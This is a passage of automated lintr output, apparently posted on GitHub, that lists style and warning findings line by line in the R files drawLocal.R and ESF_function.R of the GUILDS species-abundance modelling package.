* (xplu - xmax)\n                                 ~^~\n```\n[R/drawLocal.R:35:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txrgt <- min(1, xrgt)\n^~\n```\n[R/drawLocal.R:35:22:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- min(1, xrgt)\n                    ~^~~\n```\n[R/drawLocal.R:37:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L37) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:37:19:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:38:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t    return( exp( pm_sadaux(x, I, th, j, k)))\n^~\n```\n[R/drawLocal.R:38:20:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L38) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t    return( exp( pm_sadaux(x, I, th, j, k)))\n                   ^~~~~~~~~\n```\n[R/drawLocal.R:39:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:41:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tres[cnt] <- integrate(f, xlft, xrgt, abs.tol = 1e-9)$val  #checked!!!!!1\n^~\n```\n[R/drawLocal.R:41:26:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tres[cnt] <- integrate(f, xlft, xrgt, abs.tol = 1e-9)$val  #checked!!!!!1\n                        ~^~~\n```\n[R/drawLocal.R:41:62:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tres[cnt] <- integrate(f, xlft, xrgt, abs.tol = 1e-9)$val  #checked!!!!!1\n                                                            ~^~\n```\n[R/drawLocal.R:44:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t#the original algorithm had 1:j, but at the interp1 algorithm \n^\n```\n[R/drawLocal.R:44:63:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L44) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t#the original algorithm had 1:j, but at the interp1 algorithm \n                                                              ^\n```\n[R/drawLocal.R:45:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t# does not evaluate at the ends.\n^\n```\n[R/drawLocal.R:46:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tk2 <- 1:(j - 1)  \n^\n```\n[R/drawLocal.R:46:12:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\tk2 <- 1:(j - 1)  \n          ~^\n```\n[R/drawLocal.R:46:17:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tk2 <- 1:(j - 1)  \n                ^\n```\n[R/drawLocal.R:46:17:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L46) *style:* **Trailing whitespace is superfluous.**\n```r\n​\tk2 <- 1:(j - 1)  \n                ^~\n```\n[R/drawLocal.R:47:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n^\n```\n[R/drawLocal.R:47:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L47) *style:* **lines should not be more than 80 characters.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/drawLocal.R:47:14:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n            ~^~~\n```\n[R/drawLocal.R:47:35:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                                 ~^~\n```\n[R/drawLocal.R:47:49:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                                                ^~\n```\n[R/drawLocal.R:47:54:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                                                     ^~\n```\n[R/drawLocal.R:47:64:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                                                              ~^~\n```\n[R/drawLocal.R:47:83:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                                                                                 ~^~\n```\n[R/drawLocal.R:48:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tk2 <- c(k2, j)\n^\n```\n[R/drawLocal.R:48:12:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\tk2 <- c(k2, j)\n          ~^~~\n```\n[R/drawLocal.R:49:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tkesk <- c(kesk, 0)\n^\n```\n[R/drawLocal.R:49:14:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L49) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- c(kesk, 0)\n            ~^~~\n```\n[R/drawLocal.R:50:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tesk <- kesk / k2\n^\n```\n[R/drawLocal.R:50:13:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk <- kesk / k2\n           ~^\n```\n[R/drawLocal.R:51:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tesk[esk < pracma::eps()] <- pracma::eps()\n^\n```\n[R/drawLocal.R:51:17:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk[esk < pracma::eps()] <- pracma::eps()\n               ~^~\n```\n[R/drawLocal.R:51:34:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk[esk < pracma::eps()] <- pracma::eps()\n                                ~^~~\n```\n[R/drawLocal.R:52:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\treturn(esk)\n^\n```\n[R/drawLocal.R:58:5:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L58) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(length(idx0) > 0) {\n    ^\n```\n[R/drawLocal.R:59:42:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L59) *style:* **Put spaces around all infix operators.**\n```r\n​    aux <- log(th) + lgamma(I) - lgamma(I+j) +\n                                        ~^~\n```\n[R/drawLocal.R:66:9:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n        ^\n```\n[R/drawLocal.R:66:11:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n         ~^~\n```\n[R/drawLocal.R:66:14:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n            ~^~~\n```\n[R/drawLocal.R:66:16:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n               ^\n```\n[R/drawLocal.R:66:17:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n                ^\n```\n[R/drawLocal.R:68:27:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L68) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n                          ^\n```\n[R/drawLocal.R:68:28:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L68) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n                           ^\n```\n[R/drawLocal.R:68:31:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L68) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n                             ~^~~\n```\n[R/drawLocal.R:68:37:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L68) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n                                    ^~~\n```\n[R/drawLocal.R:70:27:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L70) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n                          ^\n```\n[R/drawLocal.R:70:28:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L70) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n                           ^\n```\n[R/drawLocal.R:70:31:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L70) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n                             ~^~~\n```\n[R/drawLocal.R:70:37:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L70) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n                                   ~^~~\n```\n[R/drawLocal.R:74:17:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L74) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  idxp <- which((x > 0) & (x < 1))\n                ^\n```\n[R/drawLocal.R:76:29:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L76) *style:* **Put spaces around all infix operators.**\n```r\n​  aux <- log(th) + lgamma(I)-lgamma(I + j) +\n                           ~^~\n```\n[R/drawLocal.R:80:13:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L80) *style:* **Put spaces around all infix operators.**\n```r\n​         (th-1) * log(1 - xx) - log(xx)\n           ~^~\n```\n[R/drawLocal.R:87:9:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L87) *warning:* **no visible global function definition for ‘getpx’, Did you mean 'get'?**\n```r\n​  nx <- getpx(theta, alpha_x, alpha_y, JX, JY)\n        ^~~~~\n```\n[R/drawLocal.R:91:27:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L91) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/drawLocal.R:92:27:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L92) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y <- alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/drawLocal.R:94:11:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L94) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sadx <- pm_sad(theta, I_X, JX)\n          ^~~~~~\n```\n[R/drawLocal.R:95:11:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L95) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sady <- pm_sad(theta, I_Y, JY)\n          ^~~~~~\n```\n[R/drawLocal.R:106:27:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L106) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny) \n                         ~^~\n```\n[R/drawLocal.R:106:66:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L106) *style:* **Trailing whitespace is superfluous.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny) \n                                                                 ^\n```\n[R/drawLocal.R:107:27:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L107) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y <- alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/drawLocal.R:110:3:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L110) *style:* **Variable and function names should be all lowercase.**\n```r\n​  allN <- 0:J\n  ^~~~\n```\n[R/drawLocal.R:111:5:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L111) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(is.infinite(I_X) && is.infinite(I_Y)) {\n    ^\n```\n[R/drawLocal.R:112:28:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L112) *style:* **Put spaces around all infix operators.**\n```r\n​     probs <- exp( lgamma(J+1) - \n                          ~^~\n```\n[R/drawLocal.R:112:33:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L112) *style:* **Trailing whitespace is superfluous.**\n```r\n​     probs <- exp( lgamma(J+1) - \n                                ^\n```\n[R/drawLocal.R:113:27:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L113) *style:* **Variable and function names should be all lowercase.**\n```r\n​                  (lgamma(allN + 1) + \n                          ^~~~\n```\n[R/drawLocal.R:113:38:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L113) *style:* **Trailing whitespace is superfluous.**\n```r\n​                  (lgamma(allN + 1) + \n                                     ^\n```\n[R/drawLocal.R:114:30:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L114) *style:* **Variable and function names should be all lowercase.**\n```r\n​                  lgamma(J - allN + 1)) + \n                             ^~~~\n```\n[R/drawLocal.R:114:42:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L114) *style:* **Trailing whitespace is superfluous.**\n```r\n​                  lgamma(J - allN + 1)) + \n                                         ^\n```\n[R/drawLocal.R:115:21:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L115) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    allN * log(nx) + \n                    ^~~~\n```\n[R/drawLocal.R:115:37:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L115) *style:* **Trailing whitespace is superfluous.**\n```r\n​                    allN * log(nx) + \n                                    ^\n```\n[R/drawLocal.R:116:23:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L116) *style:* **Put spaces around all infix operators.**\n```r\n​                    (J-allN) * log(ny))\n                     ~^~\n```\n[R/drawLocal.R:116:24:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L116) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    (J-allN) * log(ny))\n                       ^~~~\n```\n[R/drawLocal.R:118:14:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L118) *warning:* **no visible global function definition for ‘polyaeggenberger’**\n```r\n​    probs <- polyaeggenberger(I_X, I_Y, J, allN)\n             ^~~~~~~~~~~~~~~~\n```\n[R/drawLocal.R:118:44:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L118) *style:* **Variable and function names should be all lowercase.**\n```r\n​    probs <- polyaeggenberger(I_X, I_Y, J, allN)\n                                           ^~~~\n```\n[R/drawLocal.R:124:11:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L124) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sadx <- pm_sad(theta, I_X, NX)\n          ^~~~~~\n```\n[R/drawLocal.R:125:11:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L125) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sady <- pm_sad(theta, I_Y, NY)\n          ^~~~~~\n```\n[R/ESF_function.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​logLikelihood.ESF <- function(theta, m, abund) {\n^~~~~~~~~~~~~~~~~\n```\n[R/ESF_function.R:2:5:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L2) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(theta < 1 || \n    ^\n```\n[R/ESF_function.R:2:18:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L2) *style:* **Trailing whitespace is superfluous.**\n```r\n​  if(theta < 1 || \n                 ^\n```\n[R/ESF_function.R:3:12:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L3) *style:* **Put spaces around all infix operators.**\n```r\n​     m > (1-.Machine$double.eps) ||\n          ~^~\n```\n[R/ESF_function.R:11:14:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​  I <- m * (J-1) / (1 - m)\n            ~^~\n```\n[R/ESF_function.R:13:10:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L13) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda <- calcKDA(abund)  #confirmed in PARI\n         ^~~~~~~\n```\n[R/ESF_function.R:13:10:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L13) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda <- calcKDA(abund)  #confirmed in PARI\n         ^~~~~~~\n```\n[R/ESF_function.R:15:13:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L15) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  sumkda <- calc_sum_kda(S, J, I, theta, kda)  \n            ^~~~~~~~~~~~\n```\n[R/ESF_function.R:15:46:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L15) *style:* **Trailing whitespace is superfluous.**\n```r\n​  sumkda <- calc_sum_kda(S, J, I, theta, kda)  \n                                             ^~\n```\n[R/ESF_function.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L16) *style:* **Trailing whitespace is superfluous.**\n```r\n​ \n^\n```\n[R/ESF_function.R:19:6:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L19) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(i in seq_along(x)) freq_x[i] <- x[[i]]\n     ^\n```\n[R/ESF_function.R:20:18:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L20) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  prefactor1 <- -( sum(log(abund)) + sum(lgamma(1 + freq_x)) )\n                 ^\n```\n[R/ESF_function.R:20:18:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L20) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  prefactor1 <- -( sum(log(abund)) + sum(lgamma(1 + freq_x)) )\n                 ^\n```\n[R/ESF_function.R:20:61:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L20) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  prefactor1 <- -( sum(log(abund)) + sum(lgamma(1 + freq_x)) )\n                                                            ^\n```\n[R/ESF_function.R:21:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L21) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ESF_function.R:23:22:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​  factor1 <- lgamma(J+1) + prefactor1  \n                    ~^~\n```\n[R/ESF_function.R:23:38:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L23) *style:* **Trailing whitespace is superfluous.**\n```r\n​  factor1 <- lgamma(J+1) + prefactor1  \n                                     ^~\n```\n[R/ESF_function.R:24:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L24) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ESF_function.R:25:15:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​  factor2 <- S*log(theta)   -  (lgamma(I + J) - lgamma(I))\n             ~^~\n```\n[R/ESF_function.R:26:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L26) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ESF_function.R:29:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L29) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  out <- -1 * esf_local(x, abund, prefactor, kda)\n^\n```\n[R/ESF_function.R:30:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\treturn(out)\n^~\n```\n[R/ESF_function.R:35:5:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L35) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(theta < 1 || \n    ^\n```\n[R/ESF_function.R:35:18:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L35) *style:* **Trailing whitespace is superfluous.**\n```r\n​  if(theta < 1 || \n                 ^\n```\n[R/ESF_function.R:36:15:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L36) *style:* **Trailing whitespace is superfluous.**\n```r\n​     m <= 0 || \n              ^\n```\n[R/ESF_function.R:37:12:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​     m > (1-.Machine$double.eps)) {\n          ~^~\n```\n[R/ESF_function.R:40:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L40) *style:* **Trailing whitespace is superfluous.**\n```r\n​ 